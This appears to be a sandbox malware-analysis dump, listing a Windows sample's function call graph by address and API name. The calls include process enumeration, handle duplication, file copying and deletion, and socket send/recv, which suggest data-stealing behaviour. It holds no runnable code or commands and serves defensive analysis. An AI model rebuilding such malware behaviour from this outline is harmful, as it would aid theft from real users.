21455 214d8678 closesocket 21453->21455 21453->21456 21455->21452 21456->21450 21457 214d8633 21458->21457 21459 214d12cb 21617 214d4160 21459->21617 21461 214d12d5 21632 214d5f20 21461->21632 21464 214d1315 21465 214d1354 21464->21465 21467 214d4160 28 API calls 21464->21467 21643 214d6020 21465->21643 21466 214d4160 28 API calls 21466->21464 21467->21465 21470 214d1380 21471 214d13bf 21470->21471 21472 214d4160 28 API calls 21470->21472 21654 214d6120 21471->21654 21472->21471 21474 214d4160 28 API calls 21474->21470 21476 214d13e8 21477 214d1421 21476->21477 21479 214d4160 28 API calls 21476->21479 21665 214d5c00 21477->21665 21478 214d4160 28 API calls 21478->21476 21479->21477 21483 214d1471 21717 214d67d0 21483->21717 21486 214d3a70 28 API calls 21487 214d14be 21486->21487 21488 214d67d0 31 API calls 21487->21488 21489 214d14c9 21488->21489 21490 214d3a70 28 API calls 21489->21490 21491 214d150b 21490->21491 21492 214d67d0 31 API calls 21491->21492 21493 214d1516 21492->21493 21751 214d7a40 CreateFileW 21493->21751 21495 214d1539 21496 214d3a70 28 API calls 21495->21496 21497 214d1577 21496->21497 21498 214d3a70 28 API calls 21497->21498 21510 214d15bc 21498->21510 21501 214d17ea 21503 214d180b Sleep 21501->21503 21524 214d1815 21501->21524 21801 214d7e20 21501->21801 21502 214d3a70 28 API calls 21502->21510 21503->21501 21503->21524 21505 214d3a70 28 API calls 21505->21524 21507 214d4160 28 API calls 21507->21510 21509 214d7e20 9 API calls 21512 214d1adb 21509->21512 21510->21501 21510->21502 21510->21507 21510->21524 21760 214d6220 21510->21760 21779 214d25a0 21510->21779 21829 214d4c10 28 API calls 21510->21829 21830 214d3ff0 28 API calls 21510->21830 21512->21509 21514 214d1afb Sleep 21512->21514 21515 214d1b05 21512->21515 21514->21512 21514->21515 21517 214d3a70 28 API calls 21515->21517 21518 214d1b46 21517->21518 21520 214d3a70 28 API calls 21518->21520 21519 214d25a0 43 API calls 21519->21524 21523 214d1b8b 21520->21523 21522 214d4160 28 API calls 21522->21524 21526 214d1c5c 21523->21526 21550 214d1bb1 21523->21550 21524->21505 21524->21512 21524->21519 21524->21522 21813 214d63b0 21524->21813 21831 214ddaab 26 API calls 21524->21831 21832 214da5c6 28 API calls 21524->21832 21833 214d4c10 28 API calls 21524->21833 21834 214d3ff0 28 API calls 21524->21834 21824 214d7de0 21526->21824 21533 214d1c81 21843 214d4be0 28 API calls 21533->21843 21535 214d1c9c 21844 214d4be0 28 API calls 21535->21844 21537 214d25a0 43 API calls 21537->21550 21538 214d1cb5 21845 214d4be0 28 API calls 21538->21845 21541 214d1cd0 21846 214d4be0 28 API calls 21541->21846 21542 214d36c0 26 API calls 21542->21550 21544 214d1ce9 21847 214d4be0 28 API calls 21544->21847 21547 214d1d04 21848 214d4be0 28 API calls 21547->21848 21550->21526 21550->21537 21550->21542 21835 214d33e0 28 API calls 21550->21835 21836 214d3500 28 API calls 21550->21836 21837 214d64b0 36 API calls 21550->21837 21838 214d3730 26 API calls 21550->21838 21839 214d3460 28 API calls 21550->21839 21840 214d4c10 28 API calls 21550->21840 21841 214d36a0 28 API calls 21550->21841 21551 214d1d1d 21849 214d4be0 28 API calls 21551->21849 21554 214d1d38 21850 214d4be0 28 API calls 21554->21850 21556 214d1d51 21851 214d4be0 28 API calls 21556->21851 21558 214d1d69 21852 214d4be0 28 API calls 21558->21852 21560 214d1d7f 21853 214d4be0 28 API calls 21560->21853 21562 214d1d9a 21854 214d36c0 21562->21854 21564 214d1da5 21565 214d36c0 26 API calls 21564->21565 21566 214d1dad 21565->21566 21567 214d36c0 26 API calls 21566->21567 21568 214d1db8 21567->21568 21569 214d36c0 26 API calls 21568->21569 21570 214d1dc3 21569->21570 21571 214d36c0 26 API calls 21570->21571 21572 214d1dce 21571->21572 21573 214d36c0 26 API calls 21572->21573 21574 214d1dd9 21573->21574 21575 214d36c0 26 API calls 21574->21575 21576 214d1de4 21575->21576 21577 214d36c0 26 API calls 21576->21577 21578 214d1def 21577->21578 21579 214d36c0 26 API calls 21578->21579 21580 214d1dfa 21579->21580 21581 214d36c0 26 API calls 21580->21581 21582 214d1e05 21581->21582 21583 214d36c0 26 API calls 21582->21583 21584 214d1e10 21583->21584 21865 214d38d0 28 API calls 21584->21865 21586 214d1e1b 21866 214d38d0 28 API calls 21586->21866 21588 214d1e26 21867 214d38d0 28 API calls 21588->21867 21590 214d1e31 21868 214d3460 28 API calls 21590->21868 21592 214d1e3c 21869 214d3460 28 API calls 21592->21869 21594 214d1e44 21870 214d3460 28 API calls 21594->21870 21596 214d1e4f 21871 214d3460 28 API calls 21596->21871 21598 214d1e5a 21872 214d3460 28 API calls 21598->21872 21600 214d1e65 21601 214d36c0 26 API calls 21600->21601 21602 214d1e70 21601->21602 21603 214d36c0 26 API calls 21602->21603 21604 214d1e7b 21603->21604 21605 214d36c0 26 API calls 21604->21605 21606 214d1e86 21605->21606 21607 214d36c0 26 API calls 21606->21607 21608 214d1e8e 21607->21608 21609 214d36c0 26 API calls 21608->21609 21610 214d1e99 21609->21610 21611 214d36c0 26 API calls 21610->21611 21612 214d1ea4 21611->21612 21613 214d36c0 26 API calls 21612->21613 21614 214d1eaf 21613->21614 21615 214d36c0 26 API calls 21614->21615 21616 214d1eba 21615->21616 21618 214d41a0 21617->21618 21621 214d4170 21617->21621 21873 214ddaab 26 API calls 21618->21873 21621->21461 21633 214d5f53 21632->21633 21874 214d3970 21633->21874 21635 214d5f99 21886 214d4330 21635->21886 21637 214d5faf PathFileExistsW 21638 214d5fd2 21637->21638 21640 214d5fc7 21637->21640 21639 214d3970 28 API calls 21638->21639 21639->21640 21641 214d12f1 21640->21641 21642 214d4160 28 API calls 21640->21642 21641->21464 21641->21466 21642->21641 21644 214d6053 21643->21644 21645 214d3970 28 API calls 21644->21645 21646 214d6099 21645->21646 21647 214d4330 28 API calls 21646->21647 21648 214d60af PathFileExistsW 21647->21648 21649 214d60d2 21648->21649 21651 214d60c7 21648->21651 21650 214d3970 28 API calls 21649->21650 21650->21651 21652 214d135c 21651->21652 21653 214d4160 28 API calls 21651->21653 21652->21470 21652->21474 21653->21652 21655 214d6153 21654->21655 21656 214d3970 28 API calls 21655->21656 21657 214d6199 21656->21657 21658 214d4330 28 API calls 21657->21658 21659 214d61af PathFileExistsW 21658->21659 21660 214d61d2 21659->21660 21662 214d61c7 21659->21662 21661 214d3970 28 API calls 21660->21661 21661->21662 21663 214d13c7 21662->21663 21664 214d4160 28 API calls 21662->21664 21663->21476 21663->21478 21664->21663 21666 214d5c37 21665->21666 21667 214d3970 28 API calls 21666->21667 21668 214d5c79 21667->21668 21669 214d4330 28 API calls 21668->21669 21670 214d5c8f 21669->21670 21923 214d4d80 21670->21923 21674 214d5ccc 21677 214d5ce5 21674->21677 21678 214d5d04 FindNextFileW 21674->21678 21675 214d5cc2 21676 214d4160 28 API calls 21675->21676 21676->21674 21680 214d3970 28 API calls 21677->21680 21679 214d5e96 FindClose 21678->21679 21691 214d5d36 21678->21691 21937 214d34a0 21679->21937 21682 214d5cff 21680->21682 21686 214d142c 21682->21686 21687 214d4160 28 API calls 21682->21687 21683 214d5e84 FindNextFileW 21683->21679 21683->21691 21684 214d5ea9 21685 214d36c0 26 API calls 21684->21685 21685->21682 21700 214d3a70 21686->21700 21687->21686 21688 214d3970 28 API calls 21688->21691 21689 214d4d80 28 API calls 21689->21691 21691->21683 21691->21688 21691->21689 21692 214d4160 28 API calls 21691->21692 21693 214d5e5c PathFileExistsW 21691->21693 21694 214d4160 28 API calls 21691->21694 21696 214d5e7a 21691->21696 21929 214d6d90 21691->21929 21692->21691 21693->21691 21695 214d5ed9 FindClose 21693->21695 21694->21693 21697 214d5eeb 21695->21697 21698 214d4160 28 API calls 21696->21698 21697->21684 21699 214d4160 28 API calls 21697->21699 21698->21683 21699->21684 21701 214d3b6c 21700->21701 21702 214d3a89 21700->21702 21947 214da5c6 28 API calls 21701->21947 21703 214d3aca 21702->21703 21704 214d3a97 21702->21704 21708 214d3ad6 21703->21708 21709 214d3b80 21703->21709 21706 214d3b76 21704->21706 21707 214d3aa3 21704->21707 21948 214da5c6 28 API calls 21706->21948 21945 214d4280 28 API calls 21707->21945 21716 214d3ae6 21708->21716 21946 214d46f0 28 API calls 21708->21946 21949 214da5a6 28 API calls 21709->21949 21715 214d3ac1 21715->21483 21716->21483 21718 214d4d80 28 API calls 21717->21718 21719 214d682c PathFileExistsW 21718->21719 21720 214d684b 21719->21720 21721 214d6897 21719->21721 21722 214d3970 28 API calls 21720->21722 21723 214d4d80 28 API calls 21721->21723 21724 214d686e 21722->21724 21725 214d68a7 21723->21725 21950 214d6b40 28 API calls 21724->21950 21727 214d68c5 21725->21727 21731 214d4160 28 API calls 21725->21731 21728 214d68f8 PathFileExistsW 21727->21728 21729 214d4160 28 API calls 21727->21729 21730 214d690a 21728->21730 21748 214d693c 21728->21748 21729->21728 21732 214d34a0 28 API calls 21730->21732 21731->21727 21733 214d6917 21732->21733 21951 214d6b40 28 API calls 21733->21951 21734 214d4160 28 API calls 21734->21748 21736 214d4d80 28 API calls 21736->21748 21737 214d687d 21737->21734 21737->21748 21738 214d6d90 28 API calls 21738->21748 21739 214d6a0d PathFileExistsW 21739->21748 21740 214d4160 28 API calls 21740->21739 21741 214d7d50 28 API calls 21741->21748 21742 214d6af3 21743 214d6b05 21742->21743 21745 214d4160 28 API calls 21742->21745 21746 214d147c 21743->21746 21747 214d4160 28 API calls 21743->21747 21745->21743 21746->21486 21747->21746 21748->21736 21748->21738 21748->21739 21748->21740 21748->21741 21748->21742 21749 214d6bc0 28 API calls 21748->21749 21750 214d4160 28 API calls 21748->21750 21952 214d4a00 28 API calls 21748->21952 21749->21748 21750->21748 21752 214d7a68 GetFileSize 21751->21752 21753 214d7aca 21751->21753 21754 214d7a94 21752->21754 21756 214d7a7b ReadFile 21752->21756 21753->21495 21953 214d8280 28 API calls 21754->21953 21758 214d7ac4 CloseHandle 21756->21758 21759 214d7ad2 CloseHandle 21756->21759 21758->21753 21759->21495 21761 214d6253 21760->21761 21762 214d3970 28 API calls 21761->21762 21763 214d6299 21762->21763 21764 214d3a70 28 API calls 21763->21764 21765 214d62d0 21764->21765 21954 214d7ae0 21765->21954 21768 214d6300 21769 214d6333 21768->21769 21771 214d4160 28 API calls 21768->21771 21772 214d4330 28 API calls 21769->21772 21770 214d4160 28 API calls 21770->21768 21771->21769 21773 214d6342 PathFileExistsW 21772->21773 21774 214d6365 21773->21774 21776 214d635a 21773->21776 21775 214d3970 28 API calls 21774->21775 21775->21776 21777 214d6395 21776->21777 21778 214d4160 28 API calls 21776->21778 21777->21510 21778->21777 21780 214d25e4 21779->21780 21967 214d4ab0 21780->21967 21784 214d274a 21977 214d4e80 21784->21977 21786 214d2762 21787 214d4cc0 28 API calls 21786->21787 21788 214d2778 CreateProcessW 21787->21788 21790 214d27bc 21788->21790 21980 214d2b20 21790->21980 21793 214d2a98 TerminateProcess WaitForSingleObject CloseHandle CloseHandle 21794 214d2acc 21793->21794 21798 214d36c0 26 API calls 21794->21798 21796 214d296f 21797 214d3860 28 API calls 21796->21797 21799 214d2983 21797->21799 21800 214d2ad7 21798->21800 21799->21793 21800->21510 21802 214d7e40 21801->21802 21802->21802 21803 214d7ebc FindFirstFileW 21802->21803 21804 214d8092 21803->21804 21809 214d7ee2 21803->21809 21804->21501 21805 214d7f02 FindNextFileW 21806 214d806d GetLastError 21805->21806 21805->21809 21807 214d8078 FindClose RemoveDirectoryW 21806->21807 21808 214d808b FindClose 21806->21808 21807->21501 21808->21804 21809->21805 21809->21808 21810 214d8021 SetFileAttributesW 21809->21810 21811 214d8033 DeleteFileW 21809->21811 21812 214d7fed RemoveDirectoryW 21809->21812 21810->21811 21811->21808 21811->21809 21812->21809 21814 214d63e3 21813->21814 21815 214d3970 28 API calls 21814->21815 21816 214d6429 21815->21816 21817 214d4330 28 API calls 21816->21817 21818 214d643f PathFileExistsW 21817->21818 21819 214d6462 21818->21819 21821 214d6457 21818->21821 21820 214d3970 28 API calls 21819->21820 21820->21821 21822 214d6492 21821->21822 21823 214d4160 28 API calls 21821->21823 21822->21524 21823->21822 21825 214d7df4 21824->21825 21826 214d7e20 9 API calls 21825->21826 21827 214d1c6b 21825->21827 21828 214d7e01 Sleep 21825->21828 21826->21825 21842 214d4c10 28 API calls 21827->21842 21828->21825 21828->21827 21829->21510 21830->21510 21832->21524 21833->21524 21834->21524 21835->21550 21836->21550 21837->21550 21838->21550 21839->21550 21840->21550 21841->21550 21842->21533 21843->21535 21844->21538 21845->21541 21846->21544 21847->21547 21848->21551 21849->21554 21850->21556 21851->21558 21852->21560 21853->21562 21855 214d36cb 21854->21855 21856 214d36ed 21854->21856 21855->21856 21857 214d36da 21855->21857 22044 214ddaab 26 API calls 21855->22044 21856->21564 21859 214d36e1 21857->21859 22045 214ddaab 26 API calls 21857->22045 21861 214d36e8 21859->21861 22046 214ddaab 26 API calls 21859->22046 21861->21856 22047 214ddaab 26 API calls 21861->22047 21865->21586 21866->21588 21867->21590 21868->21592 21869->21594 21870->21596 21871->21598 21872->21600 21875 214d39c6 21874->21875 21880 214d397e 21874->21880 21876 214d3a5e 21875->21876 21877 214d39d6 21875->21877 21902 214da5a6 28 API calls 21876->21902 21882 214d39e6 21877->21882 21901 214d46f0 28 API calls 21877->21901 21880->21875 21883 214d39a5 21880->21883 21882->21635 21884 214d3a70 28 API calls 21883->21884 21885 214d39c0 21884->21885 21885->21635 21887 214d4386 21886->21887 21890 214d433e 21886->21890 21888 214d443f 21887->21888 21889 214d4398 21887->21889 21917 214da5a6 28 API calls 21888->21917 21892 214d4449 21889->21892 21893 214d43b0 21889->21893 21898 214d43be 21889->21898 21890->21887 21897 214d4365 21890->21897 21918 214da5a6 28 API calls 21892->21918 21893->21898 21916 214d46f0 28 API calls 21893->21916 21903 214d4890 21897->21903 21898->21637 21900 214d4380 21900->21637 21901->21882 21904 214d4979 21903->21904 21905 214d48a9 21903->21905 21920 214da5c6 28 API calls 21904->21920 21906 214d4983 21905->21906 21908 214d48c5 21905->21908 21921 214da5a6 28 API calls 21906->21921 21910 214d498d 21908->21910 21911 214d48dc 21908->21911 21915 214d48ea 21908->21915 21922 214da5a6 28 API calls 21910->21922 21911->21915 21919 214d46f0 28 API calls 21911->21919 21915->21900 21916->21898 21919->21915 21920->21906 21925 214d4dd1 21923->21925 21924 214d4890 28 API calls 21926 214d4e45 21924->21926 21925->21924 21927 214d4330 28 API calls 21926->21927 21928 214d4e6c FindFirstFileW 21927->21928 21928->21674 21928->21675 21930 214d6dd6 21929->21930 21931 214d6db1 21929->21931 21933 214d4890 28 API calls 21930->21933 21931->21930 21932 214d6dbc 21931->21932 21944 214d5a30 28 API calls 21932->21944 21935 214d6de2 21933->21935 21935->21691 21936 214d6dc7 21936->21691 21938 214d34c1 21937->21938 21939 214d34d3 21937->21939 21940 214d3970 28 API calls 21938->21940 21942 214d3970 28 API calls 21939->21942 21941 214d34cc 21940->21941 21941->21684 21943 214d34f9 21942->21943 21943->21684 21944->21936 21945->21715 21946->21716 21947->21706 21948->21709 21950->21737 21951->21737 21952->21748 21953->21756 21955 214d7b1b 21954->21955 21956 214d7bef 21955->21956 21958 214d3970 28 API calls 21955->21958 21957 214d62e2 21956->21957 21959 214d4160 28 API calls 21956->21959 21957->21768 21957->21770 21960 214d7b89 21958->21960 21959->21957 21966 214d5130 28 API calls 21960->21966 21962 214d7bbf 21963 214d3a70 28 API calls 21962->21963 21964 214d7bdd 21963->21964 21964->21956 21965 214d4160 28 API calls 21964->21965 21965->21956 21966->21962 21969 214d4afc 21967->21969 21968 214d4330 28 API calls 21970 214d4b57 21968->21970 21969->21968 21971 214d4890 28 API calls 21970->21971 21972 214d2734 21971->21972 21973 214d4cc0 21972->21973 21974 214d4ce0 21973->21974 21975 214d4330 28 API calls 21974->21975 21976 214d4d08 21975->21976 21976->21784 21978 214d4890 28 API calls 21977->21978 21979 214d4ea2 21978->21979 21979->21786 21981 214d2b42 21980->21981 22014 214d7310 LoadLibraryW 21981->22014 21983 214d2b6f 21984 214d2b75 21983->21984 21990 214d2b96 21983->21990 22018 214d3dc0 21984->22018 21986 214d36c0 26 API calls 21987 214d2951 21986->21987 21987->21793 22007 214d3860 21987->22007 21988 214d2bf2 GetLastError 21989 214d2b91 21988->21989 21989->21986 21990->21988 21996 214d2c15 21990->21996 21991 214d2d5b 21994 214d36c0 26 API calls 21991->21994 21992 214d2cd2 22035 214d2db0 28 API calls 21992->22035 21994->21989 21995 214d36c0 26 API calls 21995->21991 21996->21991 21996->21992 22034 214d3570 28 API calls 21996->22034 21997 214d2cdd 21998 214d2d07 21997->21998 22000 214d2d29 21997->22000 22036 214ddaab 26 API calls 21997->22036 22004 214d2d13 21998->22004 22037 214ddaab 26 API calls 21998->22037 22000->21995 22003 214d2d1f 22003->22000 22039 214ddaab 26 API calls 22003->22039 22004->22003 22038 214ddaab 26 API calls 22004->22038 22008 214d387f 22007->22008 22009 214d3891 22007->22009 22010 214d3dc0 28 API calls 22008->22010 22012 214d3dc0 28 API calls 22009->22012 22011 214d388a 22010->22011 22011->21796 22013 214d38aa 22012->22013 22013->21796 22015 214d73dd 22014->22015 22016 214d7326 8 API calls 22014->22016 22015->21983 22016->22015 22017 214d739f 22016->22017 22017->21983 22017->22015 22019 214d3e25 22018->22019 22024 214d3dce 22018->22024 22020 214d3e2e 22019->22020 22021 214d3eab 22019->22021 22027 214d3e3e 22020->22027 22042 214d4460 28 API calls 22020->22042 22043 214da5a6 28 API calls 22021->22043 22024->22019 22026 214d3df4 22024->22026 22028 214d3e0f 22026->22028 22029 214d3df9 22026->22029 22027->21989 22041 214d3ec0 28 API calls 22028->22041 22040 214d3ec0 28 API calls 22029->22040 22032 214d3e09 22032->21989 22033 214d3e1f 22033->21989 22034->21996 22035->21997 22040->22032 22041->22033 22042->22027 22048 214d267b 22049 214d34a0 28 API calls 22048->22049 22050 214d2684 22049->22050 22087 214d76d0 CreateToolhelp32Snapshot 22050->22087 22052 214d2693 22097 214d3330 22052->22097 22054 214d269c 22055 214d26b7 22054->22055 22058 214d26ed 22054->22058 22102 214ddaab 26 API calls 22054->22102 22055->22058 22060 214d26cb 22055->22060 22103 214ddaab 26 API calls 22055->22103 22056 214d2723 22061 214d4ab0 28 API calls 22056->22061 22058->22056 22059 214d4160 28 API calls 22058->22059 22059->22056 22063 214d26d7 22060->22063 22104 214ddaab 26 API calls 22060->22104 22064 214d2734 22061->22064 22067 214d26e3 22063->22067 22105 214ddaab 26 API calls 22063->22105 22066 214d4cc0 28 API calls 22064->22066 22069 214d274a 22066->22069 22067->22058 22106 214ddaab 26 API calls 22067->22106 22070 214d4e80 28 API calls 22069->22070 22072 214d2762 22070->22072 22073 214d4cc0 28 API calls 22072->22073 22074 214d2778 CreateProcessW 22073->22074 22076 214d27bc 22074->22076 22077 214d2b20 38 API calls 22076->22077 22078 214d2951 22077->22078 22079 214d2a98 TerminateProcess WaitForSingleObject CloseHandle CloseHandle 22078->22079 22081 214d3860 28 API calls 22078->22081 22080 214d2acc 22079->22080 22084 214d36c0 26 API calls 22080->22084 22082 214d296f 22081->22082 22083 214d3860 28 API calls 22082->22083 22085 214d2983 22083->22085 22086 214d2ad7 22084->22086 22085->22079 22088 214d7755 22087->22088 22089 214d7732 Process32FirstW 22087->22089 22088->22052 22090 214d774e CloseHandle 22089->22090 22092 214d7780 22089->22092 22090->22088 22091 214d3970 28 API calls 22091->22092 22092->22091 22093 214d4160 28 API calls 22092->22093 22094 214d7844 Process32NextW 22092->22094 22107 214d80a0 28 API calls 22092->22107 22093->22092 22094->22092 22096 214d7860 CloseHandle 22094->22096 22096->22052 22098 214d333e 22097->22098 22101 214d3353 22097->22101 22098->22101 22108 214ddaab 26 API calls 22098->22108 22101->22054 22107->22094 22109 214e5a65 22110 214e5a99 22109->22110 22111 214e5a70 RtlFreeHeap 22109->22111 22111->22110 22112 214e5a85 22111->22112 22115 214e60ec 20 API calls 22112->22115 22114 214e5a8b GetLastError 22114->22110 22115->22114 22116 214d7890 CreateToolhelp32Snapshot 22117 214d78bf Process32FirstW 22116->22117 22118 214d78e2 22116->22118 22119 214d78db CloseHandle 22117->22119 22121 214d78f0 22117->22121 22119->22118 22120 214d3970 28 API calls 22120->22121 22121->22120 22122 214d4160 28 API calls 22121->22122 22123 214d7a10 Process32NextW 22121->22123 22125 214d79d1 FindWindowExA GetWindowThreadProcessId 22121->22125 22122->22121 22123->22121 22124 214d7a2c CloseHandle 22123->22124 22125->22121 22126 214d79f7 ShowWindow 22125->22126 22126->22121 22127 214d1093 22139 214ddafb 22127->22139 22129 214d10a2 22131 214d10e3 22129->22131 22135 214d10f6 22129->22135 22146 214ddaab 26 API calls 22129->22146 22132 214d10ea 22131->22132 22147 214ddaab 26 API calls 22131->22147 22134 214d10f1 22132->22134 22148 214ddaab 26 API calls 22132->22148 22134->22135 22149 214ddaab 26 API calls 22134->22149 22141 214e5a9f 22139->22141 22140 214e5add 22151 214e60ec 20 API calls 22140->22151 22141->22140 22142 214e5ac8 RtlAllocateHeap 22141->22142 22150 214e4867 7 API calls 22141->22150 22142->22141 22144 214e5adb 22142->22144 22144->22129 22150->22141 22151->22144 22152 214d9293 22153 214d9299 22152->22153 22193 214d8550 22153->22193 22156 214d8550 44 API calls 22159 214d92e7 22156->22159 22157 214d3dc0 28 API calls 22158 214d93aa 22157->22158 22160 214d36c0 26 API calls 22158->22160 22161 214d8550 44 API calls 22159->22161 22169 214d92ef 22159->22169 22162 214d93bf 22160->22162 22163 214d931a 22161->22163 22164 214d93c4 22162->22164 22166 214d9408 send 22162->22166 22167 214d8550 44 API calls 22163->22167 22163->22169 22197 214d84c0 70 API calls 22164->22197 22170 214d9423 22166->22170 22167->22169 22168 214d97c1 22169->22157 22171 214d94c7 send 22170->22171 22172 214d94f0 22171->22172 22173 214d9507 send 22172->22173 22174 214d956e 22173->22174 22175 214d9520 22173->22175 22176 214d959d send 22174->22176 22177 214d9557 send 22175->22177 22178 214d95c2 22176->22178 22177->22174 22179 214d95d7 send 22178->22179 22180 214d95fc 22179->22180 22181 214d960f send 22180->22181 22182 214d9620 22181->22182 22183 214d9641 recv 22182->22183 22184 214d9660 22182->22184 22183->22168 22183->22182 22185 214d8550 44 API calls 22184->22185 22186 214d9698 22185->22186 22187 214d979c 22186->22187 22188 214d96ae 22186->22188 22187->22164 22189 214d96d7 recv 22188->22189 22190 214d9704 setsockopt ioctlsocket 22188->22190 22189->22168 22189->22188 22196 214da5f3 22 API calls 22190->22196 22192 214d973a 22198 214d8520 22193->22198 22196->22192 22197->22168 22199 214d8534 22198->22199 22202 214e47a1 22199->22202 22205 214dff27 22202->22205 22206 214dff59 22205->22206 22207 214dff44 22205->22207 22206->22207 22209 214dff5f 22206->22209 22225 214e60ec 20 API calls 22207->22225 22227 214de3c5 38 API calls 22209->22227 22210 214dff49 22226 214dda9b 26 API calls 22210->22226 22213 214dff54 22218 214db288 22213->22218 22214 214dff84 22228 214e3d6a 44 API calls 22214->22228 22217 214d853e 22217->22156 22217->22169 22219 214db291 22218->22219 22220 214db293 IsProcessorFeaturePresent 22218->22220 22219->22217 22222 214db2d5 22220->22222 22229 214db299 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22222->22229 22224 214db3b8 22224->22217 22225->22210 22226->22213 22227->22214 22228->22213 22229->22224 22230 214d1f42 22231 214d4330 28 API calls 22230->22231 22232 214d1f51 CreateDirectoryW 22231->22232 22233 214d4d80 28 API calls 22232->22233 22234 214d1f78 22233->22234 22235 214d4d80 28 API calls 22234->22235 22236 214d1f91 CopyFileW 22235->22236 22238 214d1fb6 22236->22238 22239 214d1fc0 22236->22239 22240 214d4160 28 API calls 22238->22240 22241 214d1ff0 22239->22241 22242 214d4160 28 API calls 22239->22242 22240->22239 22243 214d3a70 28 API calls 22241->22243 22242->22241 22244 214d2023 22243->22244 22245 214d67d0 31 API calls 22244->22245 22263 214d202b 22245->22263 22246 214d24f0 22290 214d38d0 28 API calls 22246->22290 22248 214d4d80 28 API calls 22248->22263 22249 214d250b 22250 214d2523 22249->22250 22252 214d4160 28 API calls 22249->22252 22253 214d2552 22250->22253 22256 214d4160 28 API calls 22250->22256 22251 214d2590 22292 214da5c6 28 API calls 22251->22292 22252->22250 22254 214d2578 22253->22254 22257 214d4160 28 API calls 22253->22257 22256->22253 22257->22254 22258 214d259a 22259 214d4cc0 28 API calls 22259->22263 22260 214d21d5 CreateDirectoryW CreateDirectoryW 22262 214d4330 28 API calls 22260->22262 22261 214d4160 28 API calls 22261->22260 22262->22263 22263->22246 22263->22248 22263->22251 22263->22259 22263->22260 22263->22261 22264 214d4e80 28 API calls 22263->22264 22265 214d22bc CopyFileW 22263->22265 22266 214d2365 CopyFileW 22263->22266 22267 214d4160 28 API calls 22263->22267 22271 214d4160 28 API calls 22263->22271 22272 214d258b 22263->22272 22274 214d6e60 22263->22274 22264->22263 22265->22263 22266->22263 22267->22266 22269 214d23ae CreateFileW 22269->22263 22270 214d23ea WriteFile CloseHandle 22269->22270 22270->22263 22271->22263 22291 214ddaab 26 API calls 22272->22291 22275 214d6eb4 22274->22275 22293 214d6fa0 22275->22293 22277 214d6ed5 22278 214d6f7c 22277->22278 22279 214d3dc0 28 API calls 22277->22279 22278->22269 22281 214d6efc 22279->22281 22280 214d36c0 26 API calls 22280->22278 22282 214d6f41 22281->22282 22283 214d6f1f 22281->22283 22315 214ddaab 26 API calls 22281->22315 22282->22280 22284 214d6f2b 22283->22284 22316 214ddaab 26 API calls 22283->22316 22287 214d6f37 22284->22287 22317 214ddaab 26 API calls 22284->22317 22287->22282 22318 214ddaab 26 API calls 22287->22318 22290->22249 22292->22258 22295 214d6fad 22293->22295 22294 214d6fbe 22294->22277 22295->22294 22296 214d704c OpenProcess 22295->22296 22297 214d706b 22296->22297 22298 214d7063 22296->22298 22299 214ddafb 21 API calls 22297->22299 22298->22277 22300 214d707d NtQueryInformationProcess 22299->22300 22304 214d709a 22300->22304 22308 214d70df 22300->22308 22301 214d71a7 22301->22277 22302 214d70f0 GetCurrentProcess DuplicateHandle 22302->22308 22303 214d7176 22303->22277 22304->22303 22306 214ddafb 21 API calls 22304->22306 22305 214d7127 GetFinalPathNameByHandleW 22305->22308 22307 214d70c2 NtQueryInformationProcess 22306->22307 22307->22304 22307->22308 22308->22301 22308->22302 22308->22305 22309 214d71bc CreateFileMappingW MapViewOfFile GetFileSize 22308->22309 22310 214d7192 CloseHandle 22308->22310 22311 214ddafb 21 API calls 22309->22311 22310->22308 22312 214d71f5 22311->22312 22313 214d7202 UnmapViewOfFile CloseHandle CloseHandle 22312->22313 22314 214d7222 22313->22314 22314->22277 22319 214d2f82 22321 214d2f8d 22319->22321 22326 214d2fb9 22319->22326 22320 214d2f97 22322 214d2fa3 22320->22322 22372 214ddaab 26 API calls 22320->22372 22321->22320 22371 214ddaab 26 API calls 22321->22371 22325 214d2faf 22322->22325 22373 214ddaab 26 API calls 22322->22373 22325->22326 22374 214ddaab 26 API calls 22325->22374 22328 214d3019 22326->22328 22330 214d2ff7 22326->22330 22375 214ddaab 26 API calls 22326->22375 22331 214d3057 22328->22331 22336 214d3079 22328->22336 22379 214ddaab 26 API calls 22328->22379 22332 214d3003 22330->22332 22376 214ddaab 26 API calls 22330->22376 22338 214d3063 22331->22338 22380 214ddaab 26 API calls 22331->22380 22339 214d300f 22332->22339 22377 214ddaab 26 API calls 22332->22377 22335 214d30bd 22343 214d30c9 22335->22343 22384 214ddaab 26 API calls 22335->22384 22336->22335 22342 214d30df 22336->22342 22383 214ddaab 26 API calls 22336->22383 22345 214d306f 22338->22345 22381 214ddaab 26 API calls 22338->22381 22339->22328 22378 214ddaab 26 API calls 22339->22378 22346 214d315a 22342->22346 22352 214d3138 22342->22352 22387 214ddaab 26 API calls 22342->22387 22350 214d30d5 22343->22350 22385 214ddaab 26 API calls 22343->22385 22345->22336 22382 214ddaab 26 API calls 22345->22382 22347 214d317b 22346->22347 22366 214d31c0 22346->22366 22358 214d3dc0 28 API calls 22347->22358 22350->22342 22386 214ddaab 26 API calls 22350->22386 22356 214d3144 22352->22356 22388 214ddaab 26 API calls 22352->22388 22360 214d3150 22356->22360 22389 214ddaab 26 API calls 22356->22389 22361 214d31a2 22358->22361 22360->22346 22390 214ddaab 26 API calls 22360->22390 22364 214d36c0 26 API calls 22361->22364 22365 214d31ad 22364->22365 22367 214d36c0 26 API calls 22366->22367 22368 214d3241 22367->22368 22369 214d36c0 26 API calls 22368->22369 22370 214d3258 22369->22370

                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                          Function 214D9293 Relevance: 52.9, APIs: 11, Strings: 19, Instructions: 403COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
